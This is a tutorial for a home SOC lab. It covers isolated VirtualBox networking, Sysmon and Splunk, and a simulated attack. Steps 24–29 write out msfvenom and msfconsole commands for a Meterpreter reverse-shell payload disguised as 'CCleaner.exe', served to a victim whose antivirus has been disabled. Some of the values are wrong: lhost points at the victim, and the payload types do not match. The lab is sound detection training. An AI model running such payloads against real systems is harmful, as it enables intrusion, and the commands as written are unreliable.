SOC-Home-Lab-Malware-Analysis

How to build a basic SOC home lab and analyze a malware.

Overview of steps that you will take.

1. Building isolated Windows 10 & Kali VMs.
2. Hardening & safely networking them.
3. Attacking, logging & detecting with Splunk and Sysmon.

Prerequisites

Item Recommended Version Host OS Windows 10/11 or Linux VirtualBox 7.x Windows 10 ISO Media Creation Tool Kali Linux Latest pre‑built OVA Splunk (Free) 9.x Sysmon v15+ 7‑Zip Latest

Steps

1. Download Oracle VirtualBox from offical website. Then, install it. (Can use other VMs but mind that I used Oracle VM.)

2. Download Windows installation media.

   https://www.microsoft.com/en-us/software-download/windows10

3. Click that downloaded file, choose 'create installation media' and 'ISO' file.

4. In Oracle VM, import the ISO file and configure the windows 10 in a way that can handle your computer's specifications.

5. Then, run the Windows 10 VM. Click 'install now', 'I dont have a product key', 'windows 10 pro' and 'custom'.

6. Download and insatll pre-built kali.

https://www.kali.org/get-kali/#kali-virtual-machines

7. Download and install 7-Zip if you haven't.

8. Go to your Oracle VM, set both your Kali VM (attacker) and Windows 10 VM (victim) to 'Internal Network'. In this scenario, both wont have internet and can communicate each other. This configuration will allow me to run malware and analyze traffic without affecting my host machine. Then, set the 'Network' settings for both VMs to whatever name you set for your 'Internal Network'.

9. Run Windows 10 VM, set its IPv4 address. For instance,192.168.20.10. Then run Kali, set its IPv4 address, for instance 192.168.20.11. Netmask to 24.

10. Ping Kali from Windows to know whether connection is established or not between two VMs.

11. In Windows 10, 'under virus & threat protection settings' disable the 'real-time protection'.

12. Close both the VMs. Do 'snapshots' of both the VMs so that if those VMs become corrupted, you can revert back and reuse the VMs.

13. Then open both VMs, click on the 'devices' on the top, hover your cursor to 'shared clipboard' and click 'bidirectional'.

14. In your Windows VM, install Guest Additions. VM window ▸ Devices ▸ Insert Guest Additions CD image. Inside Windows open the virtual CD drive and run 'VBoxWindowsAdditions.exe', then reboot the VM.

15. In VirtualBox Manager choose the VM ▸ Settings ▸ Shared Folders. On the right‑hand side, click the blue folder with a green ➕ ( Add new shared folder ). Designate and choose a folder where all the files will be kept so that later they can be transferrd to windows VM.

16. Download Sysmon :

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

, Download Splunk :

https://www.splunk.com/en_us/download.html

, ('inputs.conf' and 'sysmonconfig' files (in my repository)) in host machine.

17. Bring all the downloaded exe files and configurations files to the designated folder.

18. Go to Windows VM, assuming that you have brought the sysmon installation files to downloads folder, open Windows Powershell in admin mode, type these commands:

cd 'C:\Users\resis\Downloads\Sysmon'

, then

.\sysmon64.exe -i sysmonconfig.xml

. Then, click 'Agree'.

19. Install Splunk. Set username and password. Copy and paste the 'input.conf' file from downloads folder to local disk: C > Program Files > Splunk > etc > system > local.

20. Go to 'Services' by searching it in Windows search bar. Restart the 'Splunkd Services'.

21. In host machine, download this :

https://splunkbase.splunk.com/app/5709.

22. Go to Windows VM, Open http://localhost:8000 → log in. Apps ▸ Manage Apps ▸ Install app from file. Choose file → select splunk-add-on-for-microsoft-sysmon_.tgz. Click Upload. Restart the splunk.

23. Log into Splunk Web.

24. Go to Kali VM, open its terminal, enter these commands :

A)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.20.10 lport=4444 -f exe -o CCleaner.exe

B)

msfconsole

C)

use exploit/multi/handler

D)

set payload windows/x64/meterpreter/reverse_tcp

E)

set lhost 192.168.20.10

F)

exploit.

25. Open new tab in the Kali terminal itself and enter this command :

python3 -m http.server 9999

26. Go to Windows VM, open the web browser and type your Kali's IP and 9999. For instance, 192.168.20.11:9999.

27. Download the CCleaner.exe , which is the malware. Run the file. Ignore the warnings and make the windows to run it.

28. Go to Kali's terminal. By now, there should a open shell(connection).

29. Enter these commands :

shell

net user

net localgroup

ipconfig

30. Go to Windows VM's web browser, create an index by clicking on Settings > Indexes > New Index > Index Name: endpoint, click save.

31. Click on 'Apps', choose 'Search & Reporting'. In search bar, enter index=endpoint 192.168.20.11. From this search results, you can analyze all the network-traffic metadata.